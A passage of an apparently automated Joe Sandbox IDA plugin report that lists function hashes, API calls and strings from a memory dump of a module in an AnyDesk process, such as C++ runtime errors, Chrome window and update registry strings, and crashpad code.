                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                  • API String ID: 0-4289949731
                                                                                                                                                                                                                                                  • Opcode ID: 7588144b52196081f60e0df2fb1ade7ed4754ea18bec16bb943e69995a9fec32
                                                                                                                                                                                                                                                  • Instruction ID: a3053c75764bfa4b4f42fd949d6bb87ffb8f94496ed226805ef1c54c55573141
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7588144b52196081f60e0df2fb1ade7ed4754ea18bec16bb943e69995a9fec32
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1541B135B0021D9FC720CE9DFC90D5AB7AAFF867407904A2EE540CB655EB30E8559BA1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GoogleChromeDaysSinceLastRun.GCAPI ref: 69C5FDBB
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}, xrefs: 69C5FDDE
                                                                                                                                                                                                                                                  • RelaunchAllowedAfter, xrefs: 69C5FDF8
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ChromeDaysGoogleLastSince
                                                                                                                                                                                                                                                  • String ID: RelaunchAllowedAfter$Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
                                                                                                                                                                                                                                                  • API String ID: 2052684696-26780984
                                                                                                                                                                                                                                                  • Opcode ID: 28625e054a84697fdaba56164600b6f5833c4fe368c8bf90d3f08a4a7f7380a2
                                                                                                                                                                                                                                                  • Instruction ID: 7d78f6a7c38c7165048c6b63ccdfa971bf66018b1dfb971c1a3bb066d9e8e1d9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 28625e054a84697fdaba56164600b6f5833c4fe368c8bf90d3f08a4a7f7380a2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B4135319002299FEB18CFA4F944BAE73B4FF05758F108419D852AB181FBB1D871EB98
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: dmp$reports
                                                                                                                                                                                                                                                  • API String ID: 0-1316949204
                                                                                                                                                                                                                                                  • Opcode ID: a8578d1942fcd82cd06fc8c355e5f4d850d3e24ff26cc36edcb09856dd7334c6
                                                                                                                                                                                                                                                  • Instruction ID: 810f5851e3e7c176138f28b08eadda517263180513f038a3bb8089077df547de
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a8578d1942fcd82cd06fc8c355e5f4d850d3e24ff26cc36edcb09856dd7334c6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C741B175A00218ABCB14DBB4FCA0EAEB7B9EF44718F509169E415EB280FF309D05CB94
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 69C24E2C
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                  • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                  • API String ID: 909987262-4289949731
                                                                                                                                                                                                                                                  • Opcode ID: 6d9ce6c52082db26fe17a2d195f0c779b9f9d93727f59f34098737cd3b6573e7
                                                                                                                                                                                                                                                  • Instruction ID: 5dbf49ce1c2a5c9db8e94b39c687c5c07d5aa290d85a14fc3015481444cf49d0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6d9ce6c52082db26fe17a2d195f0c779b9f9d93727f59f34098737cd3b6573e7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9E31B1323047508FE3218F6CF840B5AF7A5FBD1A65F504A2FE651CB281E772D85187A1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 69C24A86
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                  • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                  • API String ID: 909987262-4289949731
                                                                                                                                                                                                                                                  • Opcode ID: 2abd4e1fd7bb29ce9d5a9716f35ec6964c153dfb7fcc354348c802d34b679953
                                                                                                                                                                                                                                                  • Instruction ID: 7e1b62fdfadef5dee81a2faeed6cd46877c725fda7252499a340004cd2c8bd50
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2abd4e1fd7bb29ce9d5a9716f35ec6964c153dfb7fcc354348c802d34b679953
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE318732308214DB8720DF6DF8C095AB3EAFF947653100A2FE656CB610FB31E9118BA5
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 69C30B4C
                                                                                                                                                                                                                                                    • Part of subcall function 69C3FC11: std::invalid_argument::invalid_argument.LIBCONCRT ref: 69C3FC1D
                                                                                                                                                                                                                                                    • Part of subcall function 69C3FC11: __CxxThrowException@8.LIBVCRUNTIME ref: 69C3FC2B
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Exception@8ThrowXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                  • String ID: ,$vector<T> too long
                                                                                                                                                                                                                                                  • API String ID: 1419379543-2403322092
                                                                                                                                                                                                                                                  • Opcode ID: 7a4b03d6f160585c72383a0bf58717c1d4677f015d6e4b67da53ff33850ef58b
                                                                                                                                                                                                                                                  • Instruction ID: 4945ec2cf1e25258d3d8843b7fa22a365ddb8452f2f802a70209ed15eddd6f5b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7a4b03d6f160585c72383a0bf58717c1d4677f015d6e4b67da53ff33850ef58b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9831E736E001289BDF00DFA8ECC0AEEF771FF09318F448528D815A7281E771A954C7A1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 69C2A70A
                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 69C2A714
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                  • String ID: string too long
                                                                                                                                                                                                                                                  • API String ID: 909987262-2556327735
                                                                                                                                                                                                                                                  • Opcode ID: d83f2734a4b2cf9f9c6151fecb39ec21425b944208f60e1f310e5a6ec9781b0f
                                                                                                                                                                                                                                                  • Instruction ID: 3570a83b72d73852bc4b4847fc3f9863965da95df1d0349dd09f603042e8f674
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d83f2734a4b2cf9f9c6151fecb39ec21425b944208f60e1f310e5a6ec9781b0f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 411190323187145B57249E6DF88081AF7EAFFE46713200A3FE596C76A0FB61A84487A5
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetClassNameW.USER32(?,?,00000104), ref: 69C5F0B2
                                                                                                                                                                                                                                                  • SetWindowPos.USER32(?,?,?,?,?,?,?), ref: 69C5F105
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ClassNameWindow
                                                                                                                                                                                                                                                  • String ID: Chrome_WidgetWin_
                                                                                                                                                                                                                                                  • API String ID: 697123166-524248775
                                                                                                                                                                                                                                                  • Opcode ID: 419dabbd16511d31d2870add5e7b910a4a1bb8479b9f1a0d825f10c0c7baa2e4
                                                                                                                                                                                                                                                  • Instruction ID: af9826a779c24aacd176db3206b9187d78cefc9d694bfad7b53796f19f379385
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 419dabbd16511d31d2870add5e7b910a4a1bb8479b9f1a0d825f10c0c7baa2e4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BE21B4B5940209BFDB14CF64EC84F9AB7B8FF24704F004559A519D7181F771E5A5CB90
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(69C78238,00000000,00000001,69C76804,00000000,00000000,?,00000000,00000000), ref: 69C6136D
                                                                                                                                                                                                                                                    • Part of subcall function 69C3C8D0: SysAllocString.OLEAUT32(?), ref: 69C3C8D9
                                                                                                                                                                                                                                                    • Part of subcall function 69C3C8F0: SysFreeString.OLEAUT32(?), ref: 69C3C8F2
                                                                                                                                                                                                                                                  • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 69C613BE
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: String$AllocBlanketCreateFreeInstanceProxy
                                                                                                                                                                                                                                                  • String ID: ROOT\CIMV2
                                                                                                                                                                                                                                                  • API String ID: 2036101689-2786109267
                                                                                                                                                                                                                                                  • Opcode ID: 79fb3796c0e8e34a012a134e614779d941dabcdf24ce64032f901be00e31c2ee
                                                                                                                                                                                                                                                  • Instruction ID: 1263be1ed96f83df26bbad6cfd9125fc899d39459411e52105c0ac8ad6bd3bfa
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 79fb3796c0e8e34a012a134e614779d941dabcdf24ce64032f901be00e31c2ee
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF215B74A40208BFDB10CFA5D8D0EAEBB7CFF49749F1081ADA906AB250E6719E41DB51
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                  • String ID: list<T> too long
                                                                                                                                                                                                                                                  • API String ID: 909987262-4027344264
                                                                                                                                                                                                                                                  • Opcode ID: bd8a004608eff1c11782bb6d2246df29cf2b9524051b6122c3095449c6f14184
                                                                                                                                                                                                                                                  • Instruction ID: 1d64ee51f23d33d3f9e3f39fe9862b2361a288447e0783d1854d3fb0a1301855
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd8a004608eff1c11782bb6d2246df29cf2b9524051b6122c3095449c6f14184
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46118CBAA01225DFCB14CF68E580A4AB7E8FF49704B5485A9ED08DB301E371ED41CBD0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 69C2A64E
                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 69C2A658
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                  • String ID: string too long
                                                                                                                                                                                                                                                  • API String ID: 909987262-2556327735
                                                                                                                                                                                                                                                  • Opcode ID: 7def1b04ac0174b99c3f24078333fbb29c8fa97dcca5334702dcd1fba0f07066
                                                                                                                                                                                                                                                  • Instruction ID: 091c7b2af80e1293eb70286dc1631fbcf5f406f6ea72f18b4f40f02420ad541d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7def1b04ac0174b99c3f24078333fbb29c8fa97dcca5334702dcd1fba0f07066
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F01102323087105A86309EACF84091EB7E9FFE0B71B110A3FE696C7690FB31E41487A5
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 69C3D184
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 69C3D195
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                  • String ID: kernel32.dll
                                                                                                                                                                                                                                                  • API String ID: 1646373207-1793498882
                                                                                                                                                                                                                                                  • Opcode ID: f30a3c06ee2358b4277e4dc90dee4e5e2e04f0d789673c5e1cf84901b2c94257
                                                                                                                                                                                                                                                  • Instruction ID: e26339ae3e19aadfd5a3f961de014e71a081dce230d7cdeba7323630ec147df2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f30a3c06ee2358b4277e4dc90dee4e5e2e04f0d789673c5e1cf84901b2c94257
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C018475A00219BBEF109E99EC44FAE7BBCFB81660F500196ED08D7140EB70D605C762
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • UuidCreate.RPCRT4(?), ref: 69C66431
                                                                                                                                                                                                                                                    • Part of subcall function 69C22340: GetLastError.KERNEL32(?,00000000), ref: 69C223D6
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\util\misc\uuid.cc, xrefs: 69C6644B
                                                                                                                                                                                                                                                  • UuidCreate, xrefs: 69C6645F
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateErrorLastUuid
                                                                                                                                                                                                                                                  • String ID: UuidCreate$c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\util\misc\uuid.cc
                                                                                                                                                                                                                                                  • API String ID: 3740028514-535133227
                                                                                                                                                                                                                                                  • Opcode ID: db96e00cc6b4b287fff55fea4dfb09eb894066b00a5166a0ce01235829c5f081
                                                                                                                                                                                                                                                  • Instruction ID: 736e058262f9c5d3e6658a3b8a826c1acc9708368b7754c3c8a648ffa041588c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db96e00cc6b4b287fff55fea4dfb09eb894066b00a5166a0ce01235829c5f081
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 93014C365407089ADB14DF64FD81FFEB3A8EF06314F005069EC05AB181EE72AA0AC670
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 69C24E2C
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                  • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                  • API String ID: 909987262-4289949731
                                                                                                                                                                                                                                                  • Opcode ID: 76d01b083fbdb7dacd4939e3925203240dfc5bdb5f6f78852d43e53a3b2d658d
                                                                                                                                                                                                                                                  • Instruction ID: df71e3fa241dfaefd0401e09e3a2ce4c1518e09a2269601a90e033551ba63e84
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 76d01b083fbdb7dacd4939e3925203240dfc5bdb5f6f78852d43e53a3b2d658d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8BD05E385402287F2A34DAA9FCC0C4E769D6A181547C08819BF049F185FBA4D8006AA1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 69C62CC2: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,69C6747F,?,?,?,69C2133F), ref: 69C62CC7
                                                                                                                                                                                                                                                    • Part of subcall function 69C62CC2: GetLastError.KERNEL32(?,69C6747F,?,?,?,69C2133F), ref: 69C62CD1
                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,69C2133F), ref: 69C67483
                                                                                                                                                                                                                                                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,69C2133F), ref: 69C67492
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 69C6748D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CountCriticalDebugDebuggerErrorInitializeLastOutputPresentSectionSpinString
                                                                                                                                                                                                                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                                  • API String ID: 450123788-631824599
                                                                                                                                                                                                                                                  • Opcode ID: f3f1846b3b7ea1082508326226399beb31eeb927324f233f83340a69e436c061
